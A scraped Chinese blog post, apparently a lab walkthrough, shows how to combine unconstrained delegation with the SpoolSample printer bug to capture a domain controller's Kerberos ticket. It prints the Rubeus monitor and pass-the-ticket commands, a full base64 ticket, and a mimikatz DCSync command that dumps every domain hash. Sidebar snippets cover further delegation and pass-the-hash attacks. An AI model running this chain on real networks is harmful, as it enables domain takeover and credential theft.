非约束性委派结合 SpoolSample 攻击

最新推荐文章于 2025-05-31 19:39:03 发布
最新推荐文章于 2025-05-31 19:39:03 发布
阅读量663 收藏 12
点赞数 20
文章标签: oracle 数据库 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anddddoooo/article/details/145761118
版权

非约束性委派机制可见:域内的三种委派方式_域控委派控制任务-优快云博客

  • 域控机器账户:WIN-0V0GAORDC17

  • 攻击者机器:win10-01

  • 配置 win10-01 的非约束性委派,如下图:

 

  1. 攻击者监听管理员发送的 tgt。

Rubeus.exe monitor /interval:1 /filteruser:WIN-0V0GAORDC17$

  1. 攻击者触发打印机漏洞使得域控主机回连访问攻击者机器。

SpoolSample.exe WIN-0V0GAORDC17 win10-01

  1. 由于非约束性委派的机制,域控访问 win10-01 域控主机需要发送 tgt ,我们使用打印机漏洞之后会立刻获得一个 base64 编码的域控机器账户的 tgt。

 

  1. 使用 Rubeus 将 base64 编码的 tgt 导入到会话中。

Rubeus.exe ptt /ticket:doIFbjCCBWqgAwIBBaEDAgEWooIEcTCCBG1hggRpMIIEZaADAgEFoQwbCkhBQ0tFUi5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBQ0tFUi5DT02jggQtMIIEKaADAgESoQMCAQKiggQbBIIEFzyfYta+DXkJcSQC4bz0C6ywbeeEr3u2767mPS/BfOCGcB6Oip5Q+MsS3iEa+Tmoxcdo87GtoPibvoiPcpeNrXwXe13l3qRrKHo8ZVUGtMU82dCWMOOp5lMIMvqhPpyJWdzvQ04rY9hUgjLbBH+JxNu94fuiU/DYGZ5y/2/H9clDLHCSk2VNZ7xcVfQI9muq/3bS+VopxfpLK48t62+/nDsoBOCINEZX3wwmOLFvKJgmuwJh3dRDZdZcRV/9uK3P2O61XATtdxpiPFpwBm8Wt0n6RxE4zKt6dkSaETS3AeFAst+7XdezdFPXd20HPmsvGfISm86pKnUqoUVHn6B0Zi23p353wLgKyV+4nRj6IhIWqkrZaMRHmqARdqoei8i+9U0qDbERc/6+Ke11Jl+6h9YAfbfl2iG+j/qXHit6GNXW8JxeKS1MtANAbkYU4ayfZV4pcPB96ByRuW0A5+lyWveeHWwyElet/jgk7ls+hysvo89Vmjv+A74OTqd2ei/puM9uvgeZWLYTd14U6vvy+Db3o9ADBYBsW6tMZPt5PewBxlfh35Exa8eysByb1rfHWhFeeQ8rMmM1nxmrZrphsIaxApeJD2s5lBlR4io7leTjh3C8Wwp0tTThKQXiGjtSRSoUX/SDGT8YkvFg7d3LjOCtdP78u0OFCMJJ/kyU9IOFtn3ShVF4ntKz1GHGa2IpB3KO0Ppuf++B6PP7BVYFhZJJeRlu/nTZKOawo6giAZB4Z86BGdP4iibab4iHE7WwRcc530+fywj6oyykwlm5hsclQfTWnJ/TNUKUvJo3XB/6MXnHRKgaQgVnEQR4dNnhuhCO8vuIrdzAkaJweg9kaOO0mS0IxSlgACh03sR12XnILpl4otasDgAznf03/zaaXtslPPT8DL5vPQv5mPkToN92PQjrUL8BpV4jFj3LC4xkcybMic512jVnjmhmOvIARG52uvkwtfzG8X0x2teUZSU0QSYa9iLAxzNDkZEj8pntl0kV9/HwJrpOyApsM8ubwRk4VkGi0hLWSJUH3Wm1wiStxrgxhT7Ik3YpWxfj/fRA1ngoN9Pu/+ITmJrXPKDVm6J/y6Da8/LLaRiC37SIL4JMXUfyxiQOOEVZqbyjGAeyKJS2VIreGL9mqFwNLCHYngjRGWhSOFz7qCtr8Kt2SAbDW6ZvJ6xVayvtydtRkPyCnh/R4HZ8uApF1QSL43MrjQbQCVcm8cRHNXWWsHC1Fb6dAgOv/6rL6725cMZYQfpFP+U7Zx2PQ29KZVtZJ/qjFWk8BIHhDpPtrdXMMDN/0lq1Zc1N5okwWItoJn0SArOtD5q74LTwucZciceS9+MU2I/4SZsknScSH76T4gj+CrbT2uHAZYrVqLWlt1hkJ9JxWqSQ28Wj0qOB6DCB5aADAgEAooHdBIHafYHXMIHUoIHRMIHOMIHLoCswKaADAgESoSIEIEIYpJGEvADSbwrlzlYtsPLSlXH5NQAMHV7pQJ9lZP+soQwbCkhBQ0tFUi5DT02iHTAboAMCAQGhFDASGxBXSU4tMFYwR0FPUkRDMTckowcDBQBgoQAApREYDzIwMjQxMjMxMDMzOTIzWqYRGA8yMDI0MTIzMTEzMzkyM1qnERgPMjAyNTAxMDcwMzM5MjNaqAwbCkhBQ0tFUi5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBQ0tFUi5DT00=

  1. 使用 mimikatz dump 域内用户的 hash。

lsadump::dcsync /all /csv

Lil_Dean
关注
约束委派攻击原理与利用
总有人间一两风,填我十万八千梦
04-07 5708
在Kerberos认证体系中,用户通过票据(如TGT和ST)来访问服务。TGT(Ticket-Granting Ticket)是用户向密钥分发中心(KDC)请求并获得的,用于后续请求服务票据(ST)。ST则是用户访问特定服务时所需的票据。
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 3313
域渗透约束委派的利用
约束委派攻击
blue_fantasy的博客
01-20 3245
Text. 0x00 原理 用户想访问服务A,于是向KDC提交认证,KDC发现A是约束性委派,于是会把TGT放在ST中一并给用户。然后用户用这个ST去访问服务A,服务A就相当于获得了用户的TGT,把TGT放入lsass进程,然后就可以拿着用户的TGT以用户的身份去访问所有用户权限能够访问的服务了。 0x01 约束委派的启用 找到Active Directory用户和计算机->Computers。给域内机器WIN7配置约束委派 右键属性->委派->信任此计算机来委派任何服
SpoolSample 项目使用教程
gitblog_00073的博客
08-13 893
SpoolSample 项目使用教程 项目地址:https://gitcode.com/gh_mirrors/sp/SpoolSample 1、项目的目录结构及介绍 SpoolSample 项目的目录结构如下: SpoolSample/ ├── README.md ├── SpoolSample.sln ├── SpoolSample/ │ ├── SpoolSample.csproj │ ...
域渗透-委派攻击
m0_58596609的博客
11-15 1613
委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取域管理员权限,甚至制作深度隐藏的后门。 一:域委派 简单明了:委派就是将域内用户的权限委派给服务账号,使得服务账号能以用户权限访问域内其他服务。将我的权限给服务账户。 1.1:委派流程 User(laosec\jack)--访问-->Websrv(以User身份)--访问-->Service(文件服务器) 需求:jack需要登陆到后台文件服务器,经过Kerberos认证的过程如下
SpoolSample-master_Spooler_TheOther_
09-28
SpoolSamplePoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.
NetNTLMtoSilverTicket:SpoolSample->响应程序wNetNTLM降级-> NetNTLMv1-> NTLM-> Kerberos银牌
05-05
SpoolSample-> NetNTLMv1-> NTLM->银票 该技术已被其他人提及,但我还没有看到有什么凝聚力。 下面,我们将逐步完成获取NetNTLMv1质询/响应身份验证,将其破解为NTLM哈希以及使用该NTLM哈希来签署Kerberos Silver票证的步骤。 这将在“ LAN Manager身份验证级别”设置为2或更小的网络上工作。 在较旧的较大Windows部署中,这是相当普遍的情况。 它不适用于Windows 10 / Server 2016或更高版本。 有3个主要步骤 获取机器帐户与@tifkin_(李·克里斯滕森)的SpoolSample对应的NetNTLMv1响应 使用@ 0x31337的(David Hulton)的Rainbow Tables将NetNTLMv1响应破解回NTLM哈希 使用@ agsolino's(Albert Solino's)ticke
红队技巧-域渗透的协议利用
Gamma_lab的博客
06-29 2629
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY约束性委派约束性委派基于资源的约束性委派基于委派攻击约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
域渗透-跨域攻击
就是法老
08-19 2278
很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根握不同职能区分的部门,从逻辑上以主域和子域进行划分,方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。攻击者如果得到了某个子公司或者某个部门的域控制器权限,但没有得到整个公司的内网全部权限,往往会想办法获取其他部门或者域的权限。 》》》跨域攻击方法《《《 WEB漏洞:跨域获取权限 PTH/PTT:DC本地管理员密码可能相同 域信任关系:....... 》》》跨域攻击--域信任关系《《《 域信任的作用:解决多域.
此计算机必须为委派而被信任_攻击活动目录:无约束委派及域林信任
weixin_35698190的博客
12-24 694
一、前言在10月份的DerbyCon 2018期间,我的小伙伴们(@tifkin_、@enigma0x3以及@harmj0y)发表了题为“The Unintended Risks of Trusting Active Directory”的精彩演讲,在演讲中他们演示了攻击者如何强制域控制器(DC)向配置了无约束委派(unconstrained delegation)的服务器发起身份认证请求,捕获并...
Oracle数据仓库在医院的应用场景
weixin_46593978的博客
05-30 470
1、解析医院多源异构数据(HIS/LIS/EMR/PACS)实时整合的技术方案。2、Oracle exadata在构建全院级数据仓库的性能优化案例。4、讨论痛点:如何平衡实时性需求与历史数据分析的存储成本?3、动态阈值预警与临床路径优化的SQL建模技巧。
Oracle 导入导出 dmp 数据文件实战
dazhong2012的专栏
05-29 1046
DMP文件操作指南摘要 DMP文件是Oracle数据库专用的二进制文件,用于数据备份、迁移和恢复。通过expdp/impdp或exp/imp工具生成,包含元数据和实际数据。导出时可通过并行处理、压缩和加密优化性能及安全性;导入时支持用户重映射、表空间调整等参数。关键操作包括全库/用户/表三种导入模式,并需注意字符集兼容性。高级场景可采用增量同步(按条件筛选变更数据)或分段导出提升效率,同时结合日志记录确保流程可追溯。传统工具(exp/imp)适用于低版本,而数据泵工具(expdp/impdp)提供更强大的功
OleDbParameter.Value 与 DataTable.Rows.Item.Value 的性能对比
05-30 1085
您提到的两种赋值操作属于不同场景,它们的性能和稳定性取决于具体使用方式。根据您的具体需求选择合适的方式,如果需要在两者之间切换,考虑使用。如果需要处理大量数据并写入数据库,使用。作为中间缓存,以提高性能和灵活性。
分析rds的空间占用
cominglately的博客
05-29 308
数据库实例可用空间告警, 我们的数据库实例硬盘空间是500GB的, 所以得分析下各个schema的占用。where table_schema 指定数据库
MySQL数据库操作
Zzzone683111的博客
05-29 698
MySQL 数据库介绍数据库目前标准的指令集是 SQL。SQL是 Structured Query Language 的缩写,即结构化查询语言。它是1974年由 Boyce 和 Chamberlin 提出来的,1975~1979 年 IBM 公司研制的关系数据库管理系统原型 System R 实现了这种语言。经过多年的发展,SQL语言得到了广泛的应用。MySQL 库的操作系统数据库
Mysql库的操作和表的操作
2302_79795375的博客
05-31 1071
现在我要创建一张学生信息表,表中包含编号,姓名,生日,性别,邮箱,在创建表之前,要先创建出一个数据库,在前面笔者已经讲过如何创建数据库了,这里笔者就不在说了,直接演示。在实际项目开发中,我们会经常修改表的某个结构,例如:字段名字,字段类型,字段大小,还有添加字段,修改字段,删除字段…我们查看一下表是否存在,表在Linux中对应的是一个文件,数据库在Linux中对应的是一个目录。细心的老铁就会发现在我们的数据库目录下还有两个文件在最前面,那么那两个文件是什么呢?现在我需要在student表中删除b字段。
Oracle DG库控制文件IO错误导致宕机的应急处理
最新发布
Sebastien23的博客
05-31 180
Oracle 12c以后的数据库支持通过RMAN直接从主库获取丢失的数据文件恢复到DG库。因此我们可以直接删掉这三个IO报错的数据文件,再从主库恢复。这一步会检查所有的数据文件(每个数据文件耗时20秒左右),如果库很大,这一步的耗时会很长。考虑到FRA还有控制文件的副本,可以拷贝过来替换掉IO错误的控制文件。正常情况下,DG库已经恢复正常了,只需要检查并拉起MRP进程即可。状态,确认并修改control_files参数为正确的控制文件。恢复完成后,检查并拉起MRP进程,打开数据库。alert日志一直刷。
Oracle】DML语言
Guiat的博客
05-30 722
DML就像是数据库的"生活管家",负责管理数据库中的实际数据。它不改变数据库的结构,而是专注于数据内容的操作。在Oracle这个数据王国里,DML是让数据"活"起来的关键工具。fill:#333;color:#333;color:#333;fill:none;DML数据操作语言INSERT插入UPDATE更新DELETE删除MERGE合并SELECT查询单行插入批量插入条件更新批量更新条件删除批量删除插入或更新数据同步简单查询复杂查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值